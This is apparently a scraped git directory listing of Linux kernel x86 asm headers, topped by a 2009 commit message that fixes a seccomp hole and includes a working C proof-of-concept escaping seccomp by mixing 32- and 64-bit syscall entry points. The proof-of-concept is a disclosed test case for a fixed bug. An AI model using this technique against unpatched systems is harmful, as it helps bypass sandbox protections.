tmp_suning_uos_patched/arch/x86/include/asm
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
bigsmp
es7000 Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-01-10 06:13:09 -08:00
mach-default x86: fix apic.c build error on latest git 2009-01-12 19:24:23 +01:00
mach-generic x86: rename mp_config_table to mpc_table 2009-01-04 13:22:58 +01:00
mach-rdc321x
mach-voyager
numaq Merge branches 'x86/cleanups', 'x86/mpparse', 'x86/numa' and 'x86/uv' into x86/urgent 2009-01-06 17:39:52 +01:00
summit Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-01-10 06:13:09 -08:00
uv x86: uv_bau.h: fix dubious bitfield 2008-12-30 13:31:37 -08:00
visws
xen x86: don't apply __supported_pte_mask to non-present ptes 2009-02-04 21:33:09 -08:00
a.out-core.h x86: include correct %gs in a.out core dump 2009-02-09 14:56:37 +01:00
a.out.h
acpi.h
agp.h
alternative-asm.h
alternative.h
amd_iommu_types.h AMD IOMMU: add init code for statistic collection 2009-01-03 14:11:58 +01:00
amd_iommu.h
apic.h x86: apic.c: xapic_icr_read and x2apic_icr_read should be static 2008-12-30 13:31:28 -08:00
apicdef.h
arch_hooks.h
asm.h
atomic_32.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
atomic_64.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
atomic.h
auxvec.h
bios_ebda.h
bitops.h x86, generic: mark complex bitops.h inlines as __always_inline 2009-01-13 18:56:30 +01:00
boot.h
bootparam.h
bug.h
bugs.h
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h
cacheflush.h
calgary.h
calling.h
checksum_32.h
checksum_64.h
checksum.h
cmpxchg_32.h
cmpxchg_64.h
cmpxchg.h
compat.h
cpu.h
cpufeature.h x86: add clflush before monitor for Intel 7400 series 2009-02-09 11:15:15 +01:00
cputime.h
current.h
debugreg.h
delay.h
desc_defs.h
desc.h x86: fix lguest used_vectors breakage, -v2 2008-12-23 22:37:28 +01:00
device.h
div64.h
dma-mapping.h Documentation: move DMA-mapping.txt to Doc/PCI/ 2009-01-29 18:19:29 -08:00
dma.h
dmi.h
ds.h
dwarf2.h
e820.h headers_check fix: x86, e820.h 2009-01-31 00:16:22 +05:30
edac.h
efi.h x86: efi.c declare add_efi_memmap before they get used 2008-12-29 18:17:32 +01:00
elf.h [S390] arch_setup_additional_pages arguments 2008-12-25 13:38:54 +01:00
emergency-restart.h
errno.h
fb.h
fcntl.h
fixmap_32.h
fixmap_64.h
fixmap.h
floppy.h
frame.h
ftrace.h
futex.h
gart.h
genapic_32.h x86: rename mpc_config_processor to mpc_cpu 2009-01-04 13:23:00 +01:00
genapic_64.h
genapic.h
geode.h
gpio.h
hardirq_32.h
hardirq_64.h
hardirq.h
highmem.h
hpet.h
hugetlb.h
hw_irq.h
hypertransport.h
hypervisor.h
i387.h
i8253.h
i8259.h
ia32_unistd.h
ia32.h
idle.h
intel_arch_perfmon.h
io_32.h
io_64.h
io_apic.h Merge branch 'irq-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:20:19 -08:00
io.h x86: fix assumed to be contiguous leaf page tables for kmap_atomic region (take 2) 2009-01-16 13:47:04 +01:00
ioctl.h
ioctls.h
iomap.h gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t 2009-02-25 13:09:51 +01:00
iommu.h Merge branch 'core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:10:19 -08:00
ipcbuf.h
ipi.h
irq_regs_32.h
irq_regs_64.h
irq_regs.h
irq_remapping.h
irq_vectors.h
irq.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
irqflags.h
ist.h
k8.h
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h
kexec.h
kgdb.h
kmap_types.h
kprobes.h
kvm_host.h KVM: change KVM to use IOMMU API 2009-01-03 14:11:07 +01:00
kvm_para.h
kvm_x86_emulate.h KVM: x86 emulator: add Src2 decode set 2008-12-31 16:55:42 +02:00
kvm.h KVM: Avoid using CONFIG_ in userspace visible headers 2009-02-15 02:47:35 +02:00
ldt.h
lguest_hcall.h
lguest.h x86: cleanup some remaining usages of NR_CPUS where s/b nr_cpu_ids 2009-01-03 19:00:55 +01:00
linkage.h
local.h
math_emu.h x86: fix math_emu register frame access 2009-02-10 00:39:14 +01:00
mc146818rtc.h
mca_dma.h
mca.h
mce.h headers_check fix: x86, mce.h 2009-01-31 00:17:13 +05:30
microcode.h
mman.h
mmconfig.h
mmu_context_32.h
mmu_context_64.h
mmu_context.h
mmu.h
mmx.h
mmzone_32.h mm: clean up for early_pfn_to_nid() 2009-02-18 15:37:55 -08:00
mmzone_64.h mm: clean up for early_pfn_to_nid() 2009-02-18 15:37:55 -08:00
mmzone.h
module.h
mpspec_def.h x86: rename all fields of mpc_table mpc_X to X 2009-01-05 14:08:34 +01:00
mpspec.h x86: find nr_irqs_gsi with mp_ioapic_routing 2009-02-09 12:42:59 +01:00
msgbuf.h
msidef.h
msr-index.h x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h> 2009-01-21 15:13:53 -08:00
msr.h Merge branch 'tracing-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-28 12:21:10 -08:00
mtrr.h headers_check fix: x86, mtrr.h 2009-01-31 00:17:39 +05:30
mutex_32.h
mutex_64.h
mutex.h
nmi.h
nops.h
numa_32.h
numa_64.h
numa.h
numaq.h
olpc.h
page_32.h
page_64.h
page.h x86, pat: fix warn_on_once() while mapping 0-1MB range with /dev/mem 2009-02-12 08:27:27 +01:00
param.h
paravirt.h Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2009-02-17 14:27:39 -08:00
parport.h
pat.h
pci_32.h
pci_64.h
pci_x86.h x86, pci: move arch/x86/pci/pci.h to arch/x86/include/asm/pci_x86.h 2008-12-29 18:17:36 +01:00
pci-direct.h
pci.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6 2008-12-31 23:05:57 +10:30
pda.h
percpu.h
pgalloc.h x86, mm: fix pte_free() 2009-01-23 18:42:06 +01:00
pgtable_32.h
pgtable_64.h
pgtable-2level-defs.h
pgtable-2level.h
pgtable-3level-defs.h
pgtable-3level.h
pgtable.h x86: don't apply __supported_pte_mask to non-present ptes 2009-02-04 21:33:09 -08:00
poll.h
posix_types_32.h
posix_types_64.h
posix_types.h
prctl.h
processor-cyrix.h
processor-flags.h
processor.h x86: math_emu info cleanup 2009-02-09 14:56:39 +01:00
proto.h
ptrace-abi.h headers_check fix: x86, ptrace-abi.h 2009-01-31 00:18:03 +05:30
ptrace.h
pvclock-abi.h
pvclock.h
reboot_fixups.h
reboot.h
required-features.h
resource.h
resume-trace.h
rio.h
rtc.h
rwlock.h
rwsem.h
scatterlist.h
seccomp_32.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
seccomp_64.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
seccomp.h
sections.h
segment.h
sembuf.h
serial.h
setup.h x86: rename mpc_config_oemtable to mpc_oemtable 2009-01-04 13:23:02 +01:00
shmbuf.h
shmparam.h
sigcontext32.h headers_check fix: x86, sigcontext32.h 2009-01-31 00:18:58 +05:30
sigcontext.h headers_check fix: x86, sigcontext.h 2009-01-31 00:18:30 +05:30
sigframe.h
siginfo.h
signal.h
smp.h x86: cleanup remaining cpumask_t ops in smpboot code 2009-01-04 15:39:26 +01:00
socket.h
sockios.h
sparsemem.h
spinlock_types.h
spinlock.h x86: spinlocks: define dummy __raw_spin_is_contended 2009-02-09 08:15:39 -08:00
srat.h
stacktrace.h
stat.h
statfs.h
string_32.h
string_64.h
string.h
suspend_32.h
suspend_64.h
suspend.h
svm.h KVM: SVM: move svm.h to include/asm 2008-12-31 16:52:28 +02:00
swab.h headers_check fix: x86, swab.h 2009-01-31 00:19:32 +05:30
swiotlb.h swiotlb: replace architecture-specific swiotlb.h with linux/swiotlb.h 2008-12-28 10:04:00 +01:00
sync_bitops.h
sys_ia32.h x86: introducing asm/sys_ia32.h 2008-12-29 13:18:40 +01:00
syscall.h
syscalls.h Revert "x86: signal: change type of paramter for sys_rt_sigreturn()" 2009-01-21 09:43:18 +01:00
system_64.h
system.h
tce.h
termbits.h
termios.h
therm_throt.h
thread_info.h Merge branch 'tracing-core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-28 12:21:10 -08:00
time.h
timer.h
timex.h x86: use standard PIT frequency 2009-01-25 16:57:47 +01:00
tlb.h
tlbflush.h
topology.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
trampoline.h
traps.h x86: fix math_emu register frame access 2009-02-10 00:39:14 +01:00
tsc.h
types.h
uaccess_32.h
uaccess_64.h
uaccess.h Merge branch 'core-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip 2008-12-30 16:10:19 -08:00
ucontext.h
unaligned.h
unistd_32.h
unistd_64.h
unistd.h
user32.h
user_32.h
user_64.h
user.h
vdso.h
vga.h
vgtod.h
vic.h
virtext.h x86: cpu_emergency_svm_disable() function 2008-12-31 16:52:30 +02:00
vm86.h
vmi_time.h
vmi.h
vmware.h
vmx.h KVM: VMX: move ASM_VMX_* definitions from asm/kvm_host.h to asm/vmx.h 2008-12-31 16:52:28 +02:00
voyager.h
vsyscall.h
xcr.h
xor_32.h
xor_64.h
xor.h
xsave.h